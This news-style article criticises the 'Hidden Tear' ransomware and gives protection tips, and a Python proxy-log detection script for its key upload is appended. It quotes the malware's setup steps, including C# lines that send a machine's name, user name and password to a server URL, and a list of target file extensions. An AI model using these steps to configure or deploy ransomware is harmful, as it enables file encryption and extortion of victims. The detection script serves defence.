Don't panic! You heard it right. If you need to earn money by demanding ransom from people for their data, here is the way to become a cyber criminal.
A Turkish security researcher named Utku Sen has posted a fully functional Ransomware code on open source code sharing website GitHub.
The Ransomware dubbed Hidden Tear, uses AES Encryption to lock down files before displaying a ransom message warning to get users to pay up.
The currently undetectable version of ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware.
Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.
The "Hidden Tear" Ransomware package consists of four files namely:
Hidden Tear Ransomware is capable of:
- Using AES algorithm to encrypt files
- Sending encryption key to a server
- Encrypting files and decrypting them using a decrypter program with the encryption key
- Creating a text file in Desktop with given message
- Small file size (12 KB)
- Evading detection by all standard anti-virus programs
How to Setup your Custom Ransomware Using Hidden Tear?
Sen has specified usage details as well. He says:
1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):
string targetURL = "https://www.example.com/hidden-tear/write.php?info=";
2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function:
string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);
3. Target file extensions can also be changed. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
For Educational Purpose... REALLY!
Wait! Sen has something more to say, listening to which you might think...REALLY!!
With the whole project "Hidden Tear," there's an attached legal warning that says:
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Somebody should ask him… Why instigate people to commit a crime? One could imagine such "Educational Purposes," as there's a big chance of Ransomware popping up in recent attacks.
A visit to the Video Demonstration of the sandbox testing of 'Hidden Tear' will give a real picture of what all it is capable of doing.
How to Protect Yourself from Ransomware Threat?
Utilize the Ransomware removal kit that could help you deal with various variants of ransomware as well as help you unlock encrypted files without paying off the cyber crooks.
However, there are some important steps that should be considered to protect yourself from Ransomware threats.
- Always keep regular backups of your important data.
- Make sure you run an active anti-virus security suite of tools on your system.
- Do not open email attachments from unknown sources.
- Most importantly, always browse the Internet safely.
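For defenders, the key-upload request quoted above (a GET whose value is computerName-userName, a space, then the password) is a network indicator. The following Python sketch is an added example, not code from the article or from Hidden Tear; the log layout, the inventory mapping and all sample values are constructed, and it assumes the proxy can see full URLs and that the password contains no spaces.

```python
import re
from urllib.parse import urlsplit, unquote

# Value built by SendPassword() on the page: computerName + "-" + userName + " " + password
VALUE_SHAPE = re.compile(r"^(?P<ident>\S+?-.+) (?P<secret>\S+)$")

# Constructed sample data: asset inventory (client IP -> computer name) and proxy log lines.
INVENTORY = {"10.0.4.17": "FINANCE07", "10.0.4.22": "DESKTOP-HR03"}
SAMPLE_LOG = """\
2015-08-20T09:14:02Z 10.0.4.17 GET https://www.example.com/hidden-tear/write.php?info=FINANCE07-alice%20Zx9&qL=2p 200
2015-08-20T09:15:40Z 10.0.4.22 GET https://search.example.org/find?q=usb-c%20cable 200
2015-08-20T09:16:11Z 10.0.4.22 GET https://cdn.example.net/s/up.py?k=DESKTOP-HR03-bob%20mK41vT0aa 200
2015-08-20T09:17:30Z 10.0.4.17 GET https://www.example.com/index.php?page=about 200
"""


def classify(client_ip, url, inventory):
    """Return a finding dict if the request looks like the key upload, else None."""
    parts = urlsplit(url)
    # Everything after the first '=' is the value: the password is arbitrary text and
    # may contain '&' or '=', so a normal query-string parser would truncate it.
    name, sep, raw = parts.query.partition("=")
    m = VALUE_SHAPE.match(unquote(raw)) if sep else None
    if not m:
        return None
    known = inventory.get(client_ip)
    # Strong signal: the client is sending its own computer name to a web server.
    own_name = bool(known) and m["ident"].lower().startswith(known.lower() + "-")
    # Weaker signal: script and parameter names left as in the page's example URL.
    default_url = parts.path.endswith("/write.php") and name == "info"
    if not (own_name or default_url):
        return None  # the shape alone also matches ordinary search terms
    return {"client": client_ip, "dest": parts.netloc, "ident": m["ident"],
            "secret": m["secret"], "own_name": own_name}


def scan(log_text, inventory):
    """Check every GET line of 'time client method url status' and collect findings."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[2] == "GET":
            hit = classify(fields[1], fields[3], inventory)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, INVENTORY):
        print(finding)
```

Where the request is visible in the logs, the captured value includes the password that the decrypter program needs, so preserve those log lines as recovery evidence.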